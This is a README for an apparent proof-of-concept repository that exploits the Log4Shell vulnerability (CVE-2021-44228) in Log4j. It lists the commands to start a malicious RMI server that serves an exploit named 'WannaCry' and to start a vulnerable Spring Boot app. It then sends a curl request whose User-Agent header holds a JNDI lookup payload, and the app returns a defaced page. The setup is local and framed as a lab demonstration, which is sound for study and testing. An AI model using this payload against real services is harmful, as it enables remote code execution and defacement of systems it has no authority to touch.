This code may contain malware and is known to contain vulnerabilities. Use at your own risk - if you use it, be advised to do that in a VM - discard the VM after use.

This is a proof of concept for the Log4j vulnerability (CVE-2021-44228), that works by evaluating an expression that pulls external code via JNDI over RMI.

It leverages Log4j 2.5.7 from spring-boot-starter-log4j2

This repository and the exploit is heavily inspired by Labout/log4shell-rmi-poc, but updated and adopted to modern Java versions.

No requirements, except Java. The code has been tested with Java 8 (JDK 1.8.0_25), Java 11 (JDK 11.0.1) and Java 19 (openjdk 19.0.2)

git clone https://github.com/rhuss/log4shell-poc.git

cd inject-server
./startRmiServer.sh 

You should get something like this:

a target/classes/static
a target/classes/static/index.html
a target/classes/static/img
a target/classes/static/img/wc.png
Starting malicious RMI Server
Creating evil RMI registry on port 1099
Bind remote exploit to 'WannaCry'

In a new Terminal

cd vulnerable-app
./startVulnerableService.sh

open http://localhost:8080

The original website is opened in your browser.

curl http://localhost:8080 --header 'User-Agent: ${jndi:rmi://127.0.0.1:1099/WannaCry}'

The website gets updated with the data provided from malicious RMI server that has been started in the first step.

open http://localhost:8080

(or just reload the previous page in your browser). The hacked website is returned.

• https://github.com/Labout/log4shell-rmi-poc
• https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
• https://www.lunasec.io/docs/blog/log4j-zero-day/